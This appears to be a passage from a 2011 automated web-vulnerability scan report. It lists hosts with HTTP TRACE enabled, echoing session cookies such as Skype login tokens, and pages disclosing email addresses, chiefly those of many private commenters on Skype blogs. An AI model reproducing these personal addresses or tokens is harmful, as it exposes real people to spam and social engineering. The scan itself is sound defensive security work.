X-Forwarded-For: 50.23.123.106
rlnclientipaddr: 50.23.123.106


19.13. http://rotation.linuxnewmedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rotation.linuxnewmedia.com
Path:   /

Request

TRACE / HTTP/1.0
Host: rotation.linuxnewmedia.com
Cookie: 9f0d73697a0bda1

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 01:54:56 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.17 with Suhosin-Patch proxy_html/3.0.0 mod_ssl/2.2.8 OpenSSL/0.9.8g
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: rotation.linuxnewmedia.com
Cookie: 9f0d73697a0bda1; OAID=d2c2db1d3c3e58afa1d9056aee9746c3; OAGEO=%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C


19.14. http://shop.skype.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /

Request

TRACE / HTTP/1.0
Host: shop.skype.com
Cookie: 60e8372fa2bbf951

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:08:58 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: shop.skype.com
Cookie: 60e8372fa2bbf951; s_vi=[CS]v1|2731DE37051D260E-4000010C00147A96[CE]; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; skype-login=t86pb1r0mu6sbpo95hdcctf9i7; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=131
...[SNIP]...

19.15. http://vap1den1.lijit.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vap1den1.lijit.com
Path:   /

Request

TRACE / HTTP/1.0
Host: vap1den1.lijit.com
Cookie: d1760e1acf7f7156

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:51 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: vap1den1.lijit.com
Cookie: d1760e1acf7f7156; ljtrtb=eJyrVjJUslIysjQytbQ0NrQwsjQ3NTE0MTc3VKoFAFC9Bds%3D; ljt_reader=b6b24fb92317290908d55ac83c3a2363; user=deleted; kohanasession=qle8v548jauct2oscav3q130d3; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2
...[SNIP]...

19.16. http://vap2den1.lijit.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vap2den1.lijit.com
Path:   /

Request

TRACE / HTTP/1.0
Host: vap2den1.lijit.com
Cookie: 390255460e5ac507

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:31:26 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: vap2den1.lijit.com
Cookie: 390255460e5ac507; user=deleted; kohanasession=qle8v548jauct2oscav3q130d3; %5FOABLOCK%5B785%5D=deleted; %5FOACAP%5B785%5D=deleted; %5FOASCAP%5B785%5D=deleted; ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYG
...[SNIP]...

19.17. http://vap3den1.lijit.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vap3den1.lijit.com
Path:   /

Request

TRACE / HTTP/1.0
Host: vap3den1.lijit.com
Cookie: 5bd223fef03e1994

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:34:07 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: vap3den1.lijit.com
Cookie: 5bd223fef03e1994; user=deleted; kohanasession=qle8v548jauct2oscav3q130d3; %5FOABLOCK%5B785%5D=deleted; %5FOACAP%5B785%5D=deleted; %5FOASCAP%5B785%5D=deleted; ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYG
...[SNIP]...

19.18. http://welcome.hp-ww.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://welcome.hp-ww.com
Path:   /

Request

TRACE / HTTP/1.0
Host: welcome.hp-ww.com
Cookie: 4afb4dc4e373b712

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Sun, 04 Sep 2011 22:41:00 GMT
Content-Type: message/http
Content-Length: 109
Expires: Sun, 04 Sep 2011 22:41:00 GMT
Connection: close

TRACE / HTTP/1.0
Host: welcome.hp-ww.com
Cookie: 4afb4dc4e373b712
_FP_X_URL: http://welcome.hp-ww.com/


19.19. http://www.cymphonix.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cymphonix.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cymphonix.com
Cookie: 3a922e944f3a737f

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:07 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g mod_perl/2.0.2 Perl/v5.8.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cymphonix.com
Cookie: 3a922e944f3a737f; Cymphonix=ed2a4b21173896ec1d2a1d8f02f1f40b; __utma=194929727.591301739.1315153157.1315153157.1315153157.1; __utmb=194929727.1.10.1315153157; __utmc=194929727; __utmz=194929727.1315153157.1.1.utmcsr=A
...[SNIP]...

19.20. http://www.lijit.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.lijit.com
Cookie: eab64f86b2036d16

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:50 GMT
Server: PWS/1.7.3.3
X-Px: nc lax-agg-n10 ( origin>CONN)
Content-Length: 397
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: www.lijit.com
User-Agent: Mozilla/5.0 (compatible; Panther)
Accept: */*
Accept-Encoding: gzip
Via: 1.1 lax-agg-n10.panthercdn.com PWS/1.7.3.3
X-Forwarded-For: 50.23.123.106, 66.114.50.75
X-Forwarded-IP: 50.23.123.106
X-Initial-Url: http://www.lijit.com/
Cookie: eab64f86b2036d16; ljtrtb=eJyrVjJUslIysjQytbQ0NrQwsjQ3NTE0MTc3VKoFAFC9Bds%3D
Connection: keep-alive


19.21. http://www.typepad.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.typepad.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.typepad.com
Cookie: c4271aab281ba47f

Response

HTTP/1.0 200 OK
Date: Mon, 05 Sep 2011 02:23:14 GMT
Server: Apache
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.typepad.com
Cookie: c4271aab281ba47f
X-Forwarded-For: 50.23.123.106, 10.17.141.102
X-6a-Remote: 10.17.141.102:48893
X-6a-Bticks: 00215670
X-6a-BTime: 610452486
Connection: keep-alive


19.22. http://www.xg4ken.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xg4ken.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.xg4ken.com
Cookie: 6bf5b2a931353c24

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:46:33 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.xg4ken.com
Cookie: 6bf5b2a931353c24; kenshoo_id=200d2a28-23e9-a048-8372-00005235d564


20. Email addresses disclosed  previous  next
There are 124 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


20.1. https://apps.skypeassets.com/static/skype.login/js/pwa-complete.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://apps.skypeassets.com
Path:   /static/skype.login/js/pwa-complete.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /static/skype.login/js/pwa-complete.js HTTP/1.1
Host: apps.skypeassets.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/javascript
ETag: "9a7a9f712f3af68e9bdfb8778e3d5a04"
X-Stratus-Processing-Time: 0.0219
Date: Sun, 04 Sep 2011 21:40:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 211564

/*!
* jquery.qtip. The jQuery tooltip plugin
*
* Copyright (c) 2009 Craig Thompson
* http://craigsworks.com
*
* Licensed under MIT
* http://www.opensource.org/licenses/mit-license.php
*
* Launch : Fe
...[SNIP]...
ide(event); }
               });
           }
       });
   });
}(jQuery));

// jFav, JQuery plugin
// v 1.0
// SAFARI & CHROME not Supported!
// Licensed under GPL licenses.
// Copyright (C) 2008 Nikos "DuMmWiaM" Kontis, info@dummwiam.com
// http://www.DuMmWiaM.com/EffectChain
// ----------------------------------------------------------------------------
// Permission is hereby granted, free of charge, to any person obtaining a cop
...[SNIP]...
<martin.kapp@skype.net>
...[SNIP]...

20.2. https://apps.skypeassets.com/static/skype.login/js/wbr-complete.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://apps.skypeassets.com
Path:   /static/skype.login/js/wbr-complete.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /static/skype.login/js/wbr-complete.js HTTP/1.1
Host: apps.skypeassets.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/javascript
ETag: "2e0ae3e6ba50467d7fde9b606568a4e4"
X-Stratus-Processing-Time: 0.0248
Date: Sun, 04 Sep 2011 21:40:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 215522

/*!
* jquery.qtip. The jQuery tooltip plugin
*
* Copyright (c) 2009 Craig Thompson
* http://craigsworks.com
*
* Licensed under MIT
* http://www.opensource.org/licenses/mit-license.php
*
* Launch : Fe
...[SNIP]...
ide(event); }
               });
           }
       });
   });
}(jQuery));

// jFav, JQuery plugin
// v 1.0
// SAFARI & CHROME not Supported!
// Licensed under GPL licenses.
// Copyright (C) 2008 Nikos "DuMmWiaM" Kontis, info@dummwiam.com
// http://www.DuMmWiaM.com/EffectChain
// ----------------------------------------------------------------------------
// Permission is hereby granted, free of charge, to any person obtaining a cop
...[SNIP]...
<martin.kapp@skype.net>
...[SNIP]...
lue == "") {
$searchField.value = initialValue;
}
});
});
}();


/**
* Helps read and write session related Flash SharedObject data.
*
* @author Erki Esken, erki.esken@skype.net, skype:dreamdrummer
* @changed on 24.02.2008 Margus Holland, margus.holland@skype.net, skype:margusholland
* now checks for availability of footer div before writing session to div
*
* This version of SessionHelper:
* - Does not depend on jQuery or YUI and uses swfobject library v
...[SNIP]...

20.3. http://blogs.skype.com/en/2005/05/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2005/05/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2005/05/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:03 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 230490
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<p>Please mailto:aries_wang@alliedtelesis.com.tw</p>
...[SNIP]...
<br />
lgcomms@wagga.net.au</p>
...[SNIP]...
<p>I would like to try this. Looking to be able to switch audio input when i am at keyboard away from telephone interface scooper1@btinternet.com</p>
...[SNIP]...
<p>salut ca va laouy9@hotmail.com</p>
...[SNIP]...
<p>My name is Stanley Gewirtz, my regular email account address: stanleymcg@aol.com</p>
...[SNIP]...
<p>My name is Stanley Gewirtz, my regular email account address: stanleymcg@aol.com</p>
...[SNIP]...
<p>My name is Stanley Gewirtz, my regular email account address: stanleymcg@aol.com</p>
...[SNIP]...

20.4. http://blogs.skype.com/en/2005/06/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2005/06/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2005/06/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:02 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 377860
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<p>can a Canadian skype member text message a portugal mobile phone using skypeout? and what are the rates for such a text message? bob_algie@yahoo.com</p>
...[SNIP]...
<p>elviojr@hotmail.com</p>
...[SNIP]...
<br />
E-mail:njyoyo2005@163.com</p>
...[SNIP]...
<br />
samarassia@yahoo.com</p>
...[SNIP]...
<br />
e_ddorf@yahoo.de</p>
...[SNIP]...
<p>info@ninoporcelli.it</p>
...[SNIP]...

20.5. http://blogs.skype.com/en/2005/07/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2005/07/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2005/07/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:00 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 594031
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<br />
vicky_kekola@yahoo.fr</p>
...[SNIP]...
<br />
wanteildo@yahoo.com.br</p>
...[SNIP]...
<br />
marouane2010-only@hotmail.com</p>
...[SNIP]...
<br />
Mail back to dennisekinci@t-online.de<br />
...[SNIP]...
<br />
Sorry to hear you had problems running it. We'd be happy to help you sort out this problem - email us at skylook@skylook.biz and we will send further instructions.<br />
...[SNIP]...
<br />
meseret277@yahoo.com<br />
...[SNIP]...
<p>ana ismii mohamed_aminei@hotmail.com </p>
...[SNIP]...
<br />
jbcrwentz@earthlink.net</p>
...[SNIP]...
<p>mail: cougetsa@redpower.com.ar / saul.couget@zoppas.com</p>
...[SNIP]...
<br />
rezende@americalink.com.br</p>
...[SNIP]...
<br />
yasmin.hage@gmail.com<br />
...[SNIP]...
<br />
purauva@gmail.com</p>
...[SNIP]...
<br />
email: 123hilary@gmail.com<br />
...[SNIP]...
k. I guess he is a blogger. I'm falling asleep so will sign off now........I mean thought I should explain that.........cause I don't know if this will turn up on their screens or not. My e-mail is sstewart@mchsi.com if I should have said anything. Thank you, Sherry</p>
...[SNIP]...
<p>kennyj1098...if anyone has the answer to my post please email me off post at: ken@littleriverstudios.com.au<br />
...[SNIP]...
<p>My friends of Skype!I have one thing to say about Skype:Persons who use his brain-use Skype!Skype is the Best!Skype is Skype!If you dont know what is is Skype...You are out of our Planet.... rrmb534@ig.com.br</p>
...[SNIP]...
<br />
blontslide@yahoo.com</p>
...[SNIP]...

20.6. http://blogs.skype.com/en/2005/08/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2005/08/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2005/08/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:57 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 412787
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<p>please imform me all this imformation by my email: smiley_day2002@yahoo.com, so i can decide if my Internet connection work well with skype out.</p>
...[SNIP]...
<p>rkress@brturbo.com.br</p>
...[SNIP]...
<p>saguya2005@hotmail.com</p>
...[SNIP]...
<p>jorge.ribeiro@sbu.org.br</p>
...[SNIP]...
<p>jorge.ribeiro@sbu.org.br</p>
...[SNIP]...
<p>i wish to contact giuseppemm37@hotmail.com he has a Skyp,com account and I have logitech QuikCom I see him but he cannot see me or hear me can you ezplain?<br />
...[SNIP]...
<a href="mailto:skypeweb@skype.com">skypeweb@skype.com</a>
...[SNIP]...
<a href="mailto:skypenet@skype.com">skypenet@skype.com</a>
...[SNIP]...
<br />
Last e-mail link says skypenet@skype.com but link is to skypeweb@skype.com</p>
...[SNIP]...
<br />
They are available for information:info@telextreme.it .</p>
...[SNIP]...
<br />
jm_riquelme@hotmail.com</p>
...[SNIP]...
only money bookers only. i was try to buy moneybookers also but can't. I want to buy out credit by my visa card. PLS help me how to i can buy out skype credit by my visa card?? my E-mail adress is : npdhital@yahoo.com , and my skype name is : narayan1231370 ,</p>
...[SNIP]...
<p>mr_abdalla2010@hotmail.com</p>
...[SNIP]...
<p>Yes I want to participate of research groups. rr534rrmb. My e mail is rrmb534@ig.com.br</p>
...[SNIP]...
<p>Hi, I'd like to participate in the research. My e-mail: liebeistliebeist@hotmail.com<br />
...[SNIP]...
<p>Yes I want to participate! Contact: canodo@skype-club.de<br />
...[SNIP]...
<br />
christina_mitchell88@hotmail.com</p>
...[SNIP]...
<br />
Every day i atleast i pronunce SKYPE once and introduce some othere. long live SKYPE. RAJ MALAYSIA ipohraj@yahoo.com</p>
...[SNIP]...
<br />
heinzstelljes1@ewetel.net</p>
...[SNIP]...
<p>Hi - anybody help ? I know you can put a callto: in an email or on a website - but can you do the same to instigate a CHAT rather than a CALL ??? - any help would be appreciated Skype sunnyles les@digital-alternatives.com - tnx <img src="http://download.skype.com/share/emoticons/0105-wink.png" alt=";-)" />
...[SNIP]...
<p>WIFI Phone design completed & any body or company interested,please contact wictronics@myjaring.net</p>
...[SNIP]...
<p>bartzone@gmail.com</p>
...[SNIP]...
<p>how can i ues skype pc to phome and the rate of it how can guid me contact in skype or e-mail laserforall@yahoo.com <br />
...[SNIP]...

20.7. http://blogs.skype.com/en/2005/09/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2005/09/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2005/09/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:56 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 362300
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<p>ANybody here? "Skype for Windows 1.4 - Have you got the new Skype?" noReply@skype.net with...ll!</p>
...[SNIP]...
<br />
kkorotev@sbcglobal.net</p>
...[SNIP]...
<p>Please reply me at: acelebi63@hotmail.com</p>
...[SNIP]...
<p>Any help to peter@loveclose.force9.co.uk greatly appreciated. Please head your e-mail as 'Friendly Skpe Suport' so that i don't delete what may appear to be junk mail.</p>
...[SNIP]...
<br />
thanks qalqilia_home@hotmail.com</p>
...[SNIP]...
<p>The name of the current driver is KMU-30A issued on Jun. 2005. If you have problems with the old one, "KMU-6", please comtact us at liliane@k-mate.com to update it.</p>
...[SNIP]...
<p>well done guys. check out my ultimate challenge company at www.charitychallenge.com.au. we send people on fabulous challenges worldwide and raise money for charities as well. contact me on eddyk@charitychallenge.com.au</p>
...[SNIP]...

20.8. http://blogs.skype.com/en/2005/10/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2005/10/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2005/10/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:54 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 301665
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<br />
y mi mail es divar99@hotmail.com<br />
...[SNIP]...
<br />
Give any feedback to contact@cbuenger.com<br />
...[SNIP]...
sed phone it runs windows mobile 5 smartphone eddition using an HTC processor can run java I believe ..are skype gooing to release a version or would a partner like to develop to run on my platform ?? deanrforbes@gmail.com if any one would like to take this further</p>
...[SNIP]...

20.9. http://blogs.skype.com/en/2005/11/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2005/11/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2005/11/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:52 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 342969
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<a href="mailto:mystory@skype.net">mystory@skype.net</a>
...[SNIP]...
<a href="mailto:mystory@skype.net">mystory@skype.net</a>
...[SNIP]...
<p>If you are interesting about this product. You can send a email to my email account emmer@esound.com.tw</p>
...[SNIP]...
<br />
chang33.tw@gmail.com</p>
...[SNIP]...
<br />
yuchihliao@hotmail.com<br />
...[SNIP]...
<br />
Fr. John M. Galea (ohchap@sbcglobal.net)<br />
...[SNIP]...
<p>emmer9997 please email me at ohmermiranda@yahoo.com i wud lyk to know more of it.</p>
...[SNIP]...
<p> saho2004@web.de</p>
...[SNIP]...
<p>cmi1234567@hotmail.com</p>
...[SNIP]...

20.10. http://blogs.skype.com/en/2005/12/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2005/12/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2005/12/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:51 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 504735
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<br />
maybe i need a Chinese keyboard as well? please send me information regarding this matter: sannicolas-stands@hotmail.com <br />
...[SNIP]...
<p>Support@TunesUp.net</p>
...[SNIP]...
<p>How come I paid but didn't get the credit. How is the credit transferred? Can you help me check out? please get to me through email. cat39cat@hotmail.com</p>
...[SNIP]...
<p>looking for russian who would like to learn and work as diver at the red sea she can e mail me i nice butfel lady btween 28 to 34 years (samirashmawy2000@hotmail.com ) or call tel 002 0123612964<br />
...[SNIP]...
/out coming calls anymore, i made the echo test and it worked, but i'm still dont have that in / out tone.... could anybody help me... is necessary for me have it.... please let me know it by email.. drica13@yahoo.com . tks in advanced</p>
...[SNIP]...

20.11. http://blogs.skype.com/en/2006/01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/01/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2006/01/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:48 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 341005
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<br />
odded@bezeqint.net</p>
...[SNIP]...
ed to tell you odddi1 or odded that you are not the only one experiencing this exact same problem. I am using MSN which I do not like now since I have no SKYPE now until someone helps me!!! Regards, m_gunnheim@hotmail.com</p>
...[SNIP]...
<p>hi my name is maksi my username;maksi2109335.i wold like to speac whith girl around the world.please call if i am online or send me an e-mail;maksi09@mail.com thanks </p>
...[SNIP]...
<br />
my e-amil address is kkday@iafrica.com</p>
...[SNIP]...
<p>I bought one of these over a year ago, the sound is scratchy, hands-free doesn't work and the external phone/mic socket is dead. I've emailed support@phoneskype.com on 3 occasions and not had a reply. I tried to see if their marketing route would help, unfortunately there is only the one email address, for support, so I'd advise anyone not to buy one of these. De
...[SNIP]...

20.12. http://blogs.skype.com/en/2006/02/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/02/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2006/02/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:47 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 345891
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<p>Very busy planning for CeBIT at the moment. If any of you are planning to attend and would like to meet with someone at Skype, please send an email to [partnermarketing@skype.net](mailto:partnermarketing@skype.net) and we can try to arrange a meeting. Make sure you include information on your company and the partnership opportunity.</p>
...[SNIP]...
<p>The Skype...Dangaard programme is open to new retailers. If you're interested in featuring Skype Certified accessories in your store you should contact Thomas Friis on [skype@dangaard.com](mailto:mail: skype@dangaard.com), or phone +45 7330 3080.</p>
...[SNIP]...
com, our ondemand web based CRM has Skype integrated in it. How can we be listed in your Partners Gallery, Certified and in general partner to share our low cost service with your users? My email is jprenner@ebsuite.com,</p>
...[SNIP]...
<p>Please let us know if you would like to work with us at these shows by contacting partnermarketing@skype.com</p>
...[SNIP]...
<p>Greetings michael Pemp (michael.pemp@gmx.de)</p>
...[SNIP]...

20.13. http://blogs.skype.com/en/2006/03/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/03/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2006/03/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:45 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 403234
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<a href="mailto:ctia2006@skype.net">ctia2006@skype.net</a>
...[SNIP]...
<p>email me at jwr_wxman@yahoo.com as I rarely check this thread</p>
...[SNIP]...
